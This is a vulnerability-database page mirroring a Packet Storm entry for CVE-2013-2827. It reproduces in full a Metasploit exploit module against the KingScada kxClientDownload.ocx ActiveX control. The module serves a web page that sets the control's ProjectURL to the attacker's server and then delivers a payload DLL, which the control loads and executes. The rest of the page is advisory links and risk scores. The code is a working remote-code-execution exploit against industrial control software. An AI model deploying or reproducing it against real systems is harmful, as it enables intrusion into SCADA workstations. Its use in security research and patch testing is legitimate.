Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAndrea MicalizziPACKETSTORM:125155
HistoryFeb 11, 2014 - 12:00 a.m.

KingScada kxClientDownload.ocx ActiveX Remote Code Execution

2014-02-1100:00:00
Andrea Micalizzi
packetstormsecurity.com
27

EPSS

0.604

Percentile

97.8%

JSON
`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::BrowserExploitServer  
include Msf::Exploit::EXE  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',  
'Description' => %q{  
This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.  
The ProjectURL property can be abused to download and load arbitrary DLLs from  
arbitrary locations, leading to arbitrary code execution, because of a dangerous  
usage of LoadLibrary. Due to the nature of the vulnerability, this module will work  
only when Protected Mode is not present or not enabled.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Andrea Micalizzi', # aka rgod original discovery  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
['CVE', '2013-2827'],  
['OSVDB', '102135'],  
['BID', '64941'],  
['ZDI', '14-011'],  
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']  
],  
'DefaultOptions' =>  
{  
'InitialAutoRunScript' => 'migrate -f',  
},  
'BrowserRequirements' =>  
{  
:source => /script|headers/i,  
:os_name => Msf::OperatingSystems::WINDOWS,  
:ua_name => /MSIE|KXCLIE/i  
},  
'Payload' =>  
{  
'Space' => 2048,  
'StackAdjustment' => -3500,  
'DisableNopes' => true  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { } ]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jan 14 2014'))  
end  
  
def on_request_exploit(cli, request, target_info)  
print_status("Requested: #{request.uri}")  
  
if request.uri =~ /\/libs\/.*\.dll/  
print_good("Sending DLL payload")  
send_response(cli,  
generate_payload_dll(:code => get_payload(cli, target_info)),  
'Content-Type' => 'application/octet-stream'  
)  
return  
elsif request.uri =~ /\/libs\//  
print_status("Sending not found")  
send_not_found(cli)  
return  
end  
  
content = <<-EOS  
<html>  
<body>  
<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>  
<param name="ProjectURL" value="#{get_module_uri}"></param>  
</object>  
</body>  
</html>  
EOS  
  
print_status("Sending #{self.name}")  
send_response_html(cli, content)  
end  
  
end  
`

Related

zdi 1
cve 1
checkpoint_advisories 1
metasploit 1
prion 1
cvelist 1
zdt 1
seebug 1
nvd 1
exploitdb 1
ics 1
zdi
zdi
WellinTech KingScada KingGraphic kxClientDownload ActiveX Remote Code Execution Vulnerability
2014-02-05 00:00:00
cve
cve
CVE-2013-2827
2014-01-15 16:08:18
checkpoint_advisories
checkpoint_advisories
WellinTech Multiple Products kxClientDownload ActiveX Remote Code Execution (CVE-2013-2827)
2014-03-13 00:00:00
metasploit
metasploit
KingScada kxClientDownload.ocx ActiveX Remote Code Execution
2014-02-07 00:25:36
prion
prion
Code injection
2014-01-15 16:08:00
cvelist
cvelist
CVE-2013-2827
2014-01-15 16:00:00
zdt
zdt
KingScada kxClientDownload.ocx ActiveX Remote Code Execution
2014-02-11 00:00:00
seebug
seebug
KingSCADA/KingGraphic远程代码执行漏洞
2014-02-12 00:00:00
nvd
nvd
CVE-2013-2827
2014-01-15 16:08:18
exploitdb
exploitdb
KingScada - kxClientDownload.ocx ActiveX Remote Code Execution (Metasploit)
2014-02-11 00:00:00
ics
ics
WellinTech Vulnerabilities
2018-09-06 12:00:00

EPSS

0.604

Percentile

97.8%

JSON
Related for PACKETSTORM:125155
zdi1cve1checkpoint_advisories1metasploit1prion1cvelist1zdt1seebug1nvd1exploitdb1ics1